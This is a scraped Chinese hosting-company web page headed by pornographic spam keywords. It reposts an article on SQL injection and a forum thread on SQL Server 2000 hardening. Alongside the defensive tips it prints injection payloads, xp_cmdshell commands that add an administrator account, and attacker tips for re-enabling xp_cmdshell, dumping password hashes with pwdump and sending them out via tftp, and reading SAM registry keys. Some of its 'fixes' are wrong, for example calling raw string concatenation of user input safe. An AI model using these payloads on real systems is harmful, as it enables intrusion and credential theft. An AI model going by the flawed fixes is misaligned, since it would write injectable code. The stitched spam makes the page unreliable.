老熟女激烈的高潮_日韩一级黄色录像_亚洲1区2区3区视频_精品少妇一区二区三区在线播放_国产欧美日产久久_午夜福利精品导航凹凸

重慶分公司,新征程啟航

為企業(yè)提供網(wǎng)站建設(shè)、域名注冊(cè)、服務(wù)器等服務(wù)

sqlserver漏洞,SQL注入漏洞產(chǎn)生的原因

如何防范SQL注入漏洞及檢測(cè)

以下是OMG我為大家收集整理的文章,希望對(duì)大家有所幫助。

在岢嵐等地區(qū),都構(gòu)建了全面的區(qū)域性戰(zhàn)略布局,加強(qiáng)發(fā)展的系統(tǒng)性、市場(chǎng)前瞻性、產(chǎn)品創(chuàng)新能力,以專注、極致的服務(wù)理念,為客戶提供成都網(wǎng)站建設(shè)、成都網(wǎng)站制作 網(wǎng)站設(shè)計(jì)制作按需網(wǎng)站開發(fā),公司網(wǎng)站建設(shè),企業(yè)網(wǎng)站建設(shè),品牌網(wǎng)站建設(shè),成都營(yíng)銷網(wǎng)站建設(shè),成都外貿(mào)網(wǎng)站制作,岢嵐網(wǎng)站建設(shè)費(fèi)用合理。

SQL注入(SQLInjection)漏洞攻擊是目前網(wǎng)上最流行最熱門的黑客腳本攻擊方法之一,那什么是SQL注入漏洞攻擊呢?它是指黑客利用一些Web應(yīng)用程序(如:網(wǎng)站、論壇、留言本、文章發(fā)布系統(tǒng)等)中某些存在不安全代碼或SQL語(yǔ)句不縝密的頁(yè)面,精心構(gòu)造SQL語(yǔ)句,把非法的SQL語(yǔ)句指令轉(zhuǎn)譯到系統(tǒng)實(shí)際SQL語(yǔ)句中并執(zhí)行它,以獲取用戶名、口令等敏感信息,從而達(dá)到控制主機(jī)服務(wù)器的攻擊方法。

1. SQL注入漏洞攻擊原理

1. 1 SQL注入漏洞攻擊實(shí)現(xiàn)原理

SQL(Structured Query Language)是一種用來(lái)和數(shù)據(jù)庫(kù)交互的語(yǔ)言文本。SQL注入的攻擊原理就是攻擊者通過(guò)Web應(yīng)用程序利用SQL語(yǔ)句或字符串將非法的數(shù)據(jù)插入到服務(wù)器端數(shù)據(jù)庫(kù)中,獲取數(shù)據(jù)庫(kù)的管理用戶權(quán)限,然后將數(shù)據(jù)庫(kù)管理用戶權(quán)限提升至操作系統(tǒng)管理用戶權(quán)限,控制服務(wù)器操作系統(tǒng),獲取重要信息及機(jī)密文件。

SQL注入漏洞攻擊主要是通過(guò)借助于HDSI、NBSI和Domain等SQL注入漏洞掃描工具掃描出Web頁(yè)面中存在的SQL注入漏洞,從而定位SQL注入點(diǎn),通過(guò)執(zhí)行非法的SQL語(yǔ)句或字符串達(dá)到入侵者想要的操作。下面以一段身份驗(yàn)證的.NET代碼為例,說(shuō)明一下SQL 注入攻擊的實(shí)現(xiàn)方法。

SqlConnectionnwConn = new SqlConnection((string)ConfigurationSettings.AppSettings["DBconnStrings"]); string queryStr = "SELECT userid,userpwd, username,type FROM users where userid='" + Txtusername.Text +"'";

DataSet userSet = new DataSet();

SqlDataAdapter userAdapter = newSqlDataAdapter(queryStr, nwConn);

userAdapter.Fill(userSet, "Users");

Session["UserID"] =Txtusername.Text.ToString();

Session["type"] =type.Text.ToString();

Response.Redirect("/Myweb/admin/login.aspx");

從上面的代碼中可以看出,程序在與數(shù)據(jù)庫(kù)建立連接得到用戶數(shù)據(jù)之后,直接將username的值通過(guò)session傳給login.aspx,沒(méi)有進(jìn)行任何的過(guò)濾和處理措施, 直接用來(lái)構(gòu)造SQL 語(yǔ)句, 其危險(xiǎn)系數(shù)是非常高的, 攻擊者只要根據(jù)SQL 語(yǔ)句的編寫規(guī)則就可以繞過(guò)身份驗(yàn)證,從而達(dá)到入侵的目的。

1. 2 SQL注入漏洞攻擊分析

SQL注入可以說(shuō)是一種漏洞,也可以說(shuō)是一種攻擊。當(dāng)程序中的變量處理不當(dāng),沒(méi)有對(duì)用戶提交的數(shù)據(jù)類型進(jìn)行校驗(yàn),編寫不安全的代碼,構(gòu)造非法的SQL語(yǔ)句或字符串,都可能產(chǎn)生這個(gè)漏洞。

例如Web系統(tǒng)有一個(gè)login頁(yè)面,這個(gè)login頁(yè)面控制著用戶是否有權(quán)訪問(wèn),要求用戶輸入一個(gè)用戶名和口令,連接數(shù)據(jù)庫(kù)的語(yǔ)句為:

“select * from users where username = 'username' andpassword = 'password'”

攻擊者輸入用戶名為aa or 1=1口令為1234 or 1=1之類的內(nèi)容。我們可以看出實(shí)際上攻擊者并不知道真正的用戶名、口令,該內(nèi)容提交給服務(wù)器之后,服務(wù)器執(zhí)行攻擊者構(gòu)造出的SQL命令,但由于攻擊者輸入的內(nèi)容非常特殊,所以最后得到的SQL命令變成:

“select * from users where username = 'aa' or 1=1 andpassword = '1234' or 1=1”

服務(wù)器執(zhí)行查詢或存儲(chǔ)過(guò)程,將用戶輸入的身份信息和數(shù)據(jù)庫(kù)users表中真實(shí)的身份信息進(jìn)行核對(duì),由于SQL命令實(shí)際上已被修改,存在永遠(yuǎn)成立的1=1條件,因此已經(jīng)不能真正驗(yàn)證用戶身份,所以系統(tǒng)會(huì)錯(cuò)誤地授權(quán)攻擊者訪問(wèn)。

SQL 注入是通過(guò)目標(biāo)服務(wù)器的80端口進(jìn)行的,是正常的Web訪問(wèn),防火墻不會(huì)對(duì)這種攻擊發(fā)出警告或攔截。當(dāng)Web服務(wù)器以普通用戶的身份訪問(wèn)數(shù)據(jù)庫(kù)時(shí),利用SQL注入漏洞就可能進(jìn)行創(chuàng)建、刪除、修改數(shù)據(jù)庫(kù)中所有數(shù)據(jù)的非法操作。而當(dāng)數(shù)據(jù)庫(kù)以管理用戶權(quán)限的身份進(jìn)行登錄時(shí),就可能控制整個(gè)數(shù)據(jù)庫(kù)服務(wù)器。

SQL注入的方法很多,在以手動(dòng)方式進(jìn)行攻擊時(shí)需要構(gòu)造各種各樣的SQL語(yǔ)句,所以一般攻擊者需要豐富的經(jīng)驗(yàn)和耐心,才能繞過(guò)檢測(cè)和處理,提交語(yǔ)句,從而獲得想要的有用信息。這個(gè)過(guò)程需要花費(fèi)很多的時(shí)間,如果以這種手動(dòng)方式進(jìn)行SQL注入漏洞攻擊,許多存在SQL注入漏洞的ASP、JSP、PHP、JAVA等網(wǎng)站就會(huì)安全很多了,不是漏洞不存在了,而是手動(dòng)入侵者需要編程基礎(chǔ),但現(xiàn)在攻擊者可以利用一些現(xiàn)成的黑客工具來(lái)輔助SQL注入漏洞攻擊,加快入侵的速度,使SQL注入變得輕而易舉。

由于SQL注入漏洞攻擊利用的是通用的SQL語(yǔ)法,使得這種攻擊具有廣泛性。理論上說(shuō),對(duì)于所有基于SQL語(yǔ)言的數(shù)據(jù)庫(kù)管理系統(tǒng)都是有效的,包括MSSQLServer、Oracle、DB2、Sybase和MySQL等。當(dāng)然,各種系統(tǒng)自身的SQL擴(kuò)展功能會(huì)有所不同,因此最終的攻擊代碼可能不盡相同。

1. 3 SQL注入漏洞攻擊過(guò)程

(1)繞過(guò)身份驗(yàn)證

如一個(gè)login界面,需要輸入用戶名和口令,然后Post到另一個(gè)頁(yè)面,進(jìn)行身份驗(yàn)證,因此攻擊者只需在用戶名和口令的輸入框中都輸入aa or’1’=’1’的內(nèi)容,那么攻擊者就可以通過(guò)欺騙的驗(yàn)證方式而直接進(jìn)入下一個(gè)頁(yè)面,并擁有和正常登錄用戶一樣的全部特權(quán)。原因是什么呢? 我們比較一下正常用戶登錄和攻擊者登錄時(shí)的兩種SQL語(yǔ)句:

1)正常用戶(如用戶名為admin,口令為1234567) :

SQL= " selectfrom users where username = ’admin’and password= ’1234567’ ";

2)攻擊者(用戶名和口令都為aa or’1’=’1’) :

SQL= " select * from users where username='aa or’1’=’1’'and password = ' aa or’1’=’1’'";

可以看到由and連接的兩個(gè)條件都被一個(gè)永遠(yuǎn)成立的1=1所代替,執(zhí)行的結(jié)果為true,數(shù)據(jù)庫(kù)會(huì)認(rèn)為條件恒成立,會(huì)返回一個(gè)true,讓攻擊者以合法身份登錄進(jìn)入下一個(gè)頁(yè)面。

(2)執(zhí)行非法操作

如一個(gè)查詢頁(yè)面select1.asp? id=1,編程人員原本設(shè)計(jì)意圖是顯示id為1的查詢信息,而攻擊者利用程序中沒(méi)有對(duì)id內(nèi)容進(jìn)行檢查的機(jī)制,插入自己的代碼。

從select1.asp中摘錄一段關(guān)鍵代碼:

SQL= " select *from photo where photoid= 'id'";

可以看到,id沒(méi)有進(jìn)行任何的處理,直接構(gòu)成SQL語(yǔ)句并執(zhí)行,而攻擊者在知道該系統(tǒng)數(shù)據(jù)庫(kù)中表名及字段名的情況下,利用SQL語(yǔ)句特性(分號(hào)是將兩句SQL 語(yǔ)句分開的符號(hào)),直接向數(shù)據(jù)庫(kù)Tuser表中添加記錄:

select1.asp? id= 1;Insertinto Tuser (username,password,type) values ('hack','1234567','管理員'),然后攻擊者就可以直接用hack進(jìn)行登錄了。通過(guò)這樣的方法,攻擊者還可以對(duì)系統(tǒng)做任何的事情,包括添加、刪除、修改系統(tǒng)資源的操作。

(3)執(zhí)行系統(tǒng)命令

如果Web主機(jī)使用MSSQL數(shù)據(jù)庫(kù)管理系統(tǒng),那么攻擊者就可以用到xp_cmdshell這個(gè)擴(kuò)展存儲(chǔ)過(guò)程,xp_cmdshell是一個(gè)非常有用的擴(kuò)展存儲(chǔ)過(guò)程,用于執(zhí)行系統(tǒng)命令,比如dir、net等,攻擊者可以根據(jù)程序的不同,提交不同的語(yǔ)句:

execmaster.dbo.xp_cmdshell " dir "; exec master.dbo.xp_cmdshell" net user hack 1234567 /add ";

execmaster.dbo.xp_cmdshell " net localgroup administrators hack /add ";

這樣就可以向Web主機(jī)系統(tǒng)中成功添加了一個(gè)管理員帳戶。

2. SQL注入漏洞攻擊的檢測(cè)方式及方法

2. 1檢測(cè)方式

SQL注入漏洞攻擊檢測(cè)分為入侵前的檢測(cè)和入侵后的檢測(cè)。入侵前的檢測(cè),可以通過(guò)手工方式,也可以使用SQL注入漏洞掃描工具軟件。檢測(cè)的目的是為預(yù)防SQL注入漏洞攻擊,而對(duì)于SQL注入漏洞攻擊后的檢測(cè),主要是針對(duì)審計(jì)日志的查看,SQL注入漏洞攻擊成功后,會(huì)在Web Service和數(shù)據(jù)庫(kù)的審計(jì)日志中留下“痕跡”。

2. 2檢測(cè)方法

(1)動(dòng)態(tài)SQL檢查

動(dòng)態(tài)的SQL語(yǔ)句是一個(gè)進(jìn)行數(shù)據(jù)庫(kù)查詢的強(qiáng)大的工具,但把它和用戶輸入混合在一起就使SQL注入成為了可能。將動(dòng)態(tài)的SQL語(yǔ)句替換成預(yù)編譯的SQL或者存儲(chǔ)過(guò)程對(duì)大多數(shù)應(yīng)用程序是可行的。預(yù)編譯的SQL或者存儲(chǔ)過(guò)程可以將用戶的輸入作為參數(shù)而不是命令來(lái)執(zhí)行,這樣就限制了入侵者的行動(dòng)。當(dāng)然,它不適用于存儲(chǔ)過(guò)程中利用用戶輸入來(lái)生成SQL命令的情況。在這種情況下,用戶輸入的SQL命令仍可能得到執(zhí)行,數(shù)據(jù)庫(kù)仍然存在SQL注入漏洞攻擊的危險(xiǎn)。

(2)有效性校驗(yàn)

如果一個(gè)輸入框只可能包括數(shù)字,那么要通過(guò)驗(yàn)證確保用戶輸入的都是數(shù)字。如果可以接受字母,檢查是不是存在不可接受的字符,那就需要設(shè)置字符串檢查功能。確保應(yīng)用程序要檢查以下字符:分號(hào)、等號(hào)、破折號(hào)、括號(hào)以及SQL關(guān)鍵字。

(3)數(shù)據(jù)表檢查

使用SQL注入漏洞攻擊工具軟件進(jìn)行SQL注入漏洞攻擊后,都會(huì)在數(shù)據(jù)庫(kù)中生成一些臨時(shí)表。通過(guò)查看數(shù)據(jù)庫(kù)中最近新建的表的結(jié)構(gòu)和內(nèi)容,可以判斷是否曾經(jīng)發(fā)生過(guò)SQL注入漏洞攻擊。

(4)審計(jì)日志檢查

在Web服務(wù)器中如果啟用了審計(jì)日志功能,則Web Service審計(jì)日志會(huì)記錄訪問(wèn)者的IP地址、訪問(wèn)時(shí)間、訪問(wèn)文件等信息,SQL注入漏洞攻擊往往會(huì)大量訪問(wèn)某一個(gè)頁(yè)面文件(存在SQL注入點(diǎn)的動(dòng)態(tài)網(wǎng)頁(yè)),審計(jì)日志文件會(huì)急劇增加,通過(guò)查看審計(jì)日志文件的大小以及審計(jì)日志文件中的內(nèi)容,可以判斷是否發(fā)生過(guò)SQL注入漏洞攻擊事件;另外還可以通過(guò)查看數(shù)據(jù)庫(kù)審計(jì)日志,查詢某個(gè)時(shí)間段是否有非法的插入、修改、刪除操作。

(5)其他

SQL注入漏洞攻擊成功后,入侵者往往會(huì)添加特權(quán)用戶(如:administrator、root、sa等)、開放非法的遠(yuǎn)程服務(wù)以及安裝木馬后門程序等,可以通過(guò)查看用戶帳戶列表、遠(yuǎn)程服務(wù)開啟情況、系統(tǒng)最近日期產(chǎn)生的一些文件等信息來(lái)判斷是否發(fā)生過(guò)入侵。

3. SQL注入漏洞防范措施

SQL注入漏洞攻擊的防范方法有很多種,現(xiàn)階段總結(jié)起來(lái)有以下方法:

(1)數(shù)據(jù)有效性校驗(yàn)。如果一個(gè)輸入框只可能包括數(shù)字,那么要通過(guò)校驗(yàn)確保用戶輸入的都是數(shù)字。如果可以接受字母,那就要檢查是不是存在不可接受的字符,最好的方法是增加字符復(fù)雜度自動(dòng)驗(yàn)證功能。確保應(yīng)用程序要檢查以下字符:分號(hào)、等號(hào)、破折號(hào)、括號(hào)以及SQL關(guān)鍵字。另外限制表單數(shù)據(jù)輸入和查詢字符串輸入的長(zhǎng)度也是一個(gè)好方法。如果用戶的登錄名最多只有10個(gè)字符,那么不要認(rèn)可表單中輸入10個(gè)以上的字符,這將大大增加攻擊者在SQL命令中插入有害代碼的難度。

(2)封裝數(shù)據(jù)信息。對(duì)客戶端提交的數(shù)據(jù)進(jìn)行封裝,不要將數(shù)據(jù)直接存入cookie中,方法就是在編程的代碼中,插入session、if、try、else,這樣可以有效地防止攻擊者獲取cookie中的重要信息。

(3)去除代碼中的敏感信息。將在代碼中存在的用戶名、口令信息等敏感字段刪除,替換成輸入框。

SQL=" select from users where username = ’admin’and password= ’1234567’ "

如:這樣顯然會(huì)暴露管理員的用戶名、口令信息。可以將其修改成:

SQL= " select * from users where username='" +Txtuser.Text + "' and userpwd='" + Textpwd.Text + "'"

這樣就安全了很多,入侵者也是不會(huì)輕易的就獲取到用戶名、口令信息。

(4)替換或刪除單引號(hào)。使用雙引號(hào)替換掉所有用戶輸入的單引號(hào),這個(gè)簡(jiǎn)單的預(yù)防措施將在很大程度上預(yù)防SQL注入漏洞攻擊,單引號(hào)時(shí)常會(huì)無(wú)法約束插入數(shù)據(jù)的Value,可能給予輸入者不必要的權(quán)限。用雙引號(hào)替換掉單引號(hào)可以使大部分SQL注入漏洞攻擊失敗。 如:

“select* from users where username='" + admin + "' and userpwd='" + 1234567+ "'”

顯然會(huì)得到與

“select * from users where username='admin' and password= '1234567'”

相同的結(jié)果。

(5)指定錯(cuò)誤返回頁(yè)面。攻擊者有時(shí)從客戶端嘗試提交有害代碼和攻擊字符串,根據(jù)Web Service給出的錯(cuò)誤提示信息來(lái)收集程序及服務(wù)器的信息,從而獲取想得到的資料。應(yīng)在Web Service中指定一個(gè)不包含任何信息的錯(cuò)誤提示頁(yè)面。

(6)限制SQL字符串連接的配置文件。使用SQL變量,因?yàn)樽兞坎皇强梢詧?zhí)行的腳本,即在Web頁(yè)面中將連接數(shù)據(jù)庫(kù)的SQL字符串替換成指定的Value,然后將Web.config文件進(jìn)行加密,拒絕訪問(wèn)。

(7)設(shè)置Web目錄的訪問(wèn)權(quán)限。將虛擬站點(diǎn)的文件目錄禁止游客用戶(如:Guest用戶等)訪問(wèn),將User用戶權(quán)限修改成只讀權(quán)限,切勿將管理權(quán)限的用戶添加到訪問(wèn)列表。

(8)最小服務(wù)原則。Web服務(wù)器應(yīng)以最小權(quán)限進(jìn)行配置,只提供Web服務(wù),這樣可以有效地阻止系統(tǒng)的危險(xiǎn)命令,如ftp、cmd、vbscript等。

(9)鑒別信息加密存儲(chǔ)。將保存在數(shù)據(jù)庫(kù)users表中的用戶名、口令信息以密文形式保存,也可以對(duì)users表進(jìn)行加密處理,這樣可以大大增加對(duì)鑒別信息訪問(wèn)的安全級(jí)別。

(10)用戶權(quán)限分離。應(yīng)盡可能的禁止或刪除數(shù)據(jù)庫(kù)中sa權(quán)限用戶的訪問(wèn),對(duì)不同的數(shù)據(jù)庫(kù)劃分不同的用戶權(quán)限,這樣不同的用戶只能對(duì)授權(quán)給自己的數(shù)據(jù)庫(kù)執(zhí)行查詢、插入、更新、刪除操作,就可以防止不同用戶對(duì)非授權(quán)的數(shù)據(jù)庫(kù)進(jìn)行訪問(wèn)。

4. 結(jié)束語(yǔ)

SQL注入漏洞攻擊在網(wǎng)上非常普遍,許多ASP、PHP論壇和文章管理系統(tǒng)、下載系統(tǒng)以及新聞系統(tǒng)都存在這個(gè)漏洞。造成SQL注入漏洞攻擊的主要原因是開發(fā)人員在系統(tǒng)開發(fā)的過(guò)程中編程不規(guī)范,沒(méi)有形成良好的編程習(xí)慣,問(wèn)題的解決只有依賴于規(guī)范編程。此外,也可以使用現(xiàn)有的SQL注入漏洞掃描器對(duì)整個(gè)網(wǎng)站中的關(guān)鍵代碼進(jìn)行掃描,查找網(wǎng)站頁(yè)面中存在的SQL注入點(diǎn)。對(duì)于有問(wèn)題的頁(yè)面,可以及時(shí)刪除或更新。本文通過(guò)對(duì)SQL注入漏洞攻擊的方法、原理以及攻擊實(shí)施過(guò)程進(jìn)行了闡述和總結(jié),并給出了一些常見的SQL注入漏洞攻擊防范的方法。

漏洞掃描工具有哪些

5款實(shí)用的漏洞掃描工具:

1、SQLmap

Sqlmap屬于滲透測(cè)試工具,但具有自動(dòng)檢測(cè)和評(píng)估漏洞的功能。該工具不只是簡(jiǎn)單地發(fā)現(xiàn)安全漏洞及利用漏洞的情況,它還針對(duì)發(fā)現(xiàn)結(jié)果創(chuàng)建了詳細(xì)的報(bào)告。Sqlmap利用Python進(jìn)行開發(fā),支持任何安裝了Python解釋器的操作系統(tǒng)。它能自動(dòng)識(shí)別密碼哈希,并使用六種不同方式來(lái)利用SQL注入漏洞。此外,Sqlmap的數(shù)據(jù)庫(kù)非常全面,支持oracle、PostgreSQL、MySQL、SqlServer和Access。

2、Nmap

Nmap是一款開源網(wǎng)絡(luò)掃描工具,應(yīng)用場(chǎng)景包括端口掃描、服務(wù)指紋識(shí)別以及操作系統(tǒng)版本識(shí)別。Nmap通常被視為網(wǎng)絡(luò)映射及端口掃描工具,但因?yàn)槠鋷в蠳map腳本引擎,也有助于對(duì)錯(cuò)誤配置問(wèn)題和安全漏洞進(jìn)行檢測(cè)。另外,Nmap具備命令行界面以及圖形用戶界面。

3、Nexpose

Nexpose社區(qū)是一個(gè)通用的開源漏洞評(píng)估工具,其漏洞引擎由Rapid7開發(fā),掃描漏洞近68000個(gè),進(jìn)行了超過(guò)16.3萬(wàn)次網(wǎng)絡(luò)檢查。針對(duì)Windows及Linux系統(tǒng)的社區(qū)版免費(fèi),但僅限32個(gè)IP地址,以及一個(gè)用戶。雖然沒(méi)有Web應(yīng)用程序掃描,但Nexpose覆蓋自動(dòng)漏洞更新以及微軟補(bǔ)丁星期二漏洞更新。

4、Retina CS

Retina CS也是一個(gè)通用的開源漏洞評(píng)估工具。它是基于Web的控制臺(tái),可以免費(fèi)簡(jiǎn)化并集中管理漏洞,可打補(bǔ)丁資產(chǎn)達(dá)到256項(xiàng)。Retina

CS能對(duì)服務(wù)器、工作站、移動(dòng)設(shè)備、數(shù)據(jù)庫(kù)、應(yīng)用程序和Web應(yīng)用程序自動(dòng)進(jìn)行漏洞評(píng)估。這款開源應(yīng)用程序?yàn)閂Mware環(huán)境提供了全方位支持,包括在線與離線虛擬鏡像掃描、虛擬應(yīng)用程序掃描,以及與Vcenter集成。

5、Burp Suite

Burp

Suite免費(fèi)版是開源的Web應(yīng)用程序漏洞掃描器,該版本屬于軟件工具包,涵蓋了對(duì)Web應(yīng)用程序手動(dòng)安全測(cè)試所需的所有東西。它可以使用攔截代理,針對(duì)瀏覽器和目標(biāo)應(yīng)用程序之間的流量進(jìn)行檢查與修改;還能利用可感知應(yīng)用程序的Spider抓取應(yīng)用程序的內(nèi)容及功能;此外,使用中繼器工具能夠處理并重新發(fā)送單個(gè)請(qǐng)求,也可訪問(wèn)針對(duì)分析及解碼應(yīng)用程序數(shù)據(jù)的一系列實(shí)用程序。

MS-SQLServer-2K-SP4怎么引起漏洞,又無(wú)法修復(fù),請(qǐng)高手們指點(diǎn)哦。謝謝!!!

你機(jī)器安裝了MS SQL了嗎?

首先在安裝策略中關(guān)閉1443端口,防火墻也要禁止.更新最新的補(bǔ)丁.

下面的文章,做個(gè)參考吧.

從codered到nimda等,一大堆蠕蟲把原來(lái)需要人工利用的漏洞都變成了程序自動(dòng)利用了,大家還想去手工操作這些IIS漏洞么?讓我們調(diào)整重心,去看看服務(wù)器常用的數(shù)據(jù)庫(kù)吧。

一般網(wǎng)站都是基于數(shù)據(jù)庫(kù)的,特別是ASP、PHP、JSP這樣的用數(shù)據(jù)庫(kù)來(lái)動(dòng)態(tài)顯示的網(wǎng)站。很多網(wǎng)站可能多注意的是操作系統(tǒng)的漏洞,但是對(duì)數(shù)據(jù)庫(kù)和這些腳本的安全總是忽略,也沒(méi)有太多注意。

從最比較普遍的腳本問(wèn)題開始,這些都是老話題了,大家可以參考Hectic寫的《關(guān)于數(shù)據(jù)庫(kù)的簡(jiǎn)單入侵和無(wú)賴破壞,以天融信做例子》,該文章對(duì)從SQL腳本問(wèn)題說(shuō)得非常詳細(xì)。對(duì)于腳本安全的解決,也可以通過(guò)過(guò)濾來(lái)實(shí)現(xiàn),可以參考我以前寫的。對(duì)于ASP來(lái)說(shuō),可以使用下面這個(gè)過(guò)濾函數(shù):

Function Filter_SQL(strData)

Dim strFilter

Dim blnFlag

Dim i

strFilter="’,;,//,--,@,_,exec,declare" ’需要過(guò)濾的字符,可以自己添加,","是分隔符

blnFlag=Flase ’過(guò)濾標(biāo)志,如果產(chǎn)生過(guò)濾,那么就是真

Dim arrayFilter

arrayFilter=Split(strFilter,",")

For i=0 To UBound(arrayFilter)

If Instr(strData,arrayFilter(i))0 Then

blnFlag=True

Exit For

End If

Next

If blnFlag Then

Response.Redirect "wrong.asp"

’當(dāng)發(fā)現(xiàn)有過(guò)濾操作時(shí),導(dǎo)向一個(gè)預(yù)定頁(yè)面。反正正常訪問(wèn)用不到的連接請(qǐng)求,總不是好事情。

Else

Filter_SQL=strData

End If

End Function

對(duì)于MS SQL

Server數(shù)據(jù)庫(kù)來(lái)說(shuō),安全問(wèn)題不僅僅局限在腳本上了。“天殺的微軟”的系統(tǒng)性很強(qiáng),整個(gè)基于WINDOWS系統(tǒng)的應(yīng)用都有很強(qiáng)的關(guān)聯(lián)性,對(duì)SQL

Server來(lái)說(shuō),基本可以把數(shù)據(jù)庫(kù)管理和系統(tǒng)管理等同起來(lái)了。SQL

Server默認(rèn)的管理員帳號(hào)“sa”的密碼是空的,這給多數(shù)NT服務(wù)器產(chǎn)生一個(gè)安全漏洞。小榕的“SQLRCMD”,就能夠利用獲得的數(shù)據(jù)庫(kù)管理員帳號(hào)執(zhí)行系統(tǒng)命令。

在SQL Server中有很多系統(tǒng)存儲(chǔ)過(guò)程,有些是數(shù)據(jù)庫(kù)內(nèi)部使用的,還有一些就是通過(guò)執(zhí)行存儲(chǔ)過(guò)程來(lái)調(diào)用系統(tǒng)命令。

系統(tǒng)存儲(chǔ)過(guò)程:xp_cmdshell

就是以操作系統(tǒng)命令行解釋器的方式執(zhí)行給定的命令字符串。它就具體語(yǔ)法是:xp_cmdshell

{’command_string’} [, no_output]

xp_cmdshell在默認(rèn)情況下,只有 sysadmin

的成員才能執(zhí)行。但是,sysadmin也可以授予其他用戶這個(gè)執(zhí)行權(quán)限。在早期版本中,獲得 xp_cmdshell

執(zhí)行權(quán)限的用戶在 SQL Server 服務(wù)的用戶帳戶中運(yùn)行命令。可以通過(guò)配置選項(xiàng)配置 SQL Server,以便對(duì) SQL

Server 無(wú) sa 訪問(wèn)權(quán)限的用戶能夠在SQLExecutiveCmdExec Windows NT 帳戶中運(yùn)行

xp_cmdshell。在 SQL Server 7.0 中,該帳戶稱為 SQLAgentCmdExec。現(xiàn)在對(duì)于SQL

Server2000,只要有一個(gè)能執(zhí)行該存儲(chǔ)過(guò)程的帳號(hào)就可以直接運(yùn)行命令了。

對(duì)于 NT 和 WIN2000,當(dāng)用戶不是 sysadmin 組的成員時(shí),xp_cmdshell 將模擬使用

xp_sqlagent_proxy_account 指定的 SQL Server 代理程序的代理帳戶。如果代理帳戶不能用,則

xp_cmdshell 將失敗。所以即使有一個(gè)帳戶是master數(shù)據(jù)庫(kù)的db_owner,也不能執(zhí)行這個(gè)存儲(chǔ)過(guò)程。

如果我們有一個(gè)能執(zhí)行xp_cmdshell的數(shù)據(jù)庫(kù)帳號(hào),比如是空口令的sa帳號(hào)。那么我們可以執(zhí)行這樣的命令:

exec xp_cmdshell ’net user refdom 123456 /add’

exec xp_cmdshell ’net localgroup administrators refdom /add’

上面兩次調(diào)用就在系統(tǒng)的管理員組中添加了一個(gè)用戶:refdom

當(dāng)我們獲得數(shù)據(jù)庫(kù)的sa管理員帳號(hào)后,就應(yīng)該可以完全控制這個(gè)機(jī)器了。可見數(shù)據(jù)庫(kù)安全的重要性。

下面這些存儲(chǔ)過(guò)程都是對(duì)Public可以執(zhí)行的:

xp_fileexist,用來(lái)確定一個(gè)文件是否存在。

xp_getfiledetails,可以獲得文件詳細(xì)資料。

xp_dirtree,可以展開你需要了解的目錄,獲得所有目錄深度。

Xp_getnetname,可以獲得服務(wù)器名稱。

還有可以操作注冊(cè)表的存儲(chǔ)過(guò)程,這些不是對(duì)Public可以執(zhí)行的,需要系統(tǒng)管理員或者授權(quán)執(zhí)行:

Xp_regaddmultistring

Xp_regdeletekey

Xp_regdeletevalue

Xp_regenumvalues

Xp_regread (對(duì)Public可以執(zhí)行)

Xp_regremovemultistring

Xp_regwrite

SQL Server的安全配置

除跟著微軟打滿所有補(bǔ)丁外,還需要加強(qiáng)數(shù)據(jù)庫(kù)的安全。

首先,你需要加強(qiáng)象sa這樣的帳號(hào)的密碼,跟系統(tǒng)帳號(hào)的使用配置相似,一般操作數(shù)據(jù)庫(kù)不要使用象sa這樣的最高權(quán)限的帳號(hào),而使用能滿足你的要求的一般帳號(hào)。

接著對(duì)擴(kuò)展存儲(chǔ)過(guò)程開始大屠殺,首先就是xp_cmdshell,還有就是上面那些一大堆存儲(chǔ)過(guò)程,都drop吧,一般也用不著。

執(zhí)行:

use master

sp_dropextendedproc ’xp_cmdshell’

去掉guest帳號(hào),阻止非授權(quán)用戶訪問(wèn)。

去掉不必要的網(wǎng)絡(luò)協(xié)議。

加強(qiáng)對(duì)數(shù)據(jù)庫(kù)登陸的日志記錄,最好記錄所有登陸事件。可以用下面的簡(jiǎn)單DOS命令來(lái)查看日志:

findstr /C:"登錄" d:\Microsoft SQL Server\MSSQL\LOG\*.*

用管理員帳號(hào)定期檢查所有帳號(hào),是否密碼為空或者過(guò)于簡(jiǎn)單,比如下面的語(yǔ)句:

Use master

Select name,Password from syslogins where password is null

用下面語(yǔ)句對(duì)所有帳號(hào),檢查對(duì)存儲(chǔ)過(guò)程和擴(kuò)展存儲(chǔ)過(guò)程的執(zhí)行權(quán),提防不必要的執(zhí)行權(quán)限擴(kuò)散:

Use master

Select sysobjects.name From sysobjects, sysprotects Where

sysprotects.uid = 0 AND xtype IN (’X’,’P’) AND sysobjects.id =

sysprotects.id

加強(qiáng)數(shù)據(jù)庫(kù)的安全是非常重要的,有的數(shù)據(jù)庫(kù)服務(wù)器是和WEB服務(wù)器隔離開的,這就同MAIL服務(wù)器一樣,數(shù)據(jù)庫(kù)的日志可能就基本很少去查看,這將會(huì)成為管理員的一個(gè)疏忽點(diǎn)。類似DNS、MAIL等等,數(shù)據(jù)庫(kù)服務(wù)器往往成為各種入侵的跳板。

下面是一些關(guān)于數(shù)據(jù)庫(kù)的問(wèn)答和技巧:

1、獲得SA權(quán)限后,卻不能執(zhí)行xp_cmdshell存儲(chǔ)過(guò)程怎么辦?

答:可能是已經(jīng)把xp_cmdshell等擴(kuò)展存儲(chǔ)過(guò)程刪除了,可以用這個(gè)存儲(chǔ)過(guò)程把xp_cmdshell恢復(fù)。

sp_addextendedproc ’xp_cmdshell’, ’xpsql70.dll’

2、通過(guò)數(shù)據(jù)庫(kù)用pwdump獲得系統(tǒng)管理員密碼

先上傳一個(gè)pwdump

tftp -i GET pwdump3.exe pwdump3.exe

tftp -i GET lsaext.dll lsaext.dll

tftp -i GET pwservice.exe pwservice.exe

pwdump3 127.0.0.1 outfile.txt

tftp PUT outfile.txt outfile.txt

然后再用解密工具l0pht等等破解這些密碼。

3、從數(shù)據(jù)庫(kù)讀取系統(tǒng)管理員密碼。

能讀出加密的密碼是NT的"administrator"帳號(hào)也不能做的,SQL

Server能讀出來(lái)是使用的“LocalSystem”帳號(hào),這個(gè)帳號(hào)比administrator更高一級(jí)。可以使用下面這個(gè)存儲(chǔ)過(guò)程。不過(guò)讀出來(lái)的密碼是經(jīng)過(guò)加密后的,然后再解密吧。

xp_regread

’HKEY_LOCAL_MACHINE’,’SECURITY\SAM\Domains\Account’,’F’

SQL注入漏洞的判斷

引 言

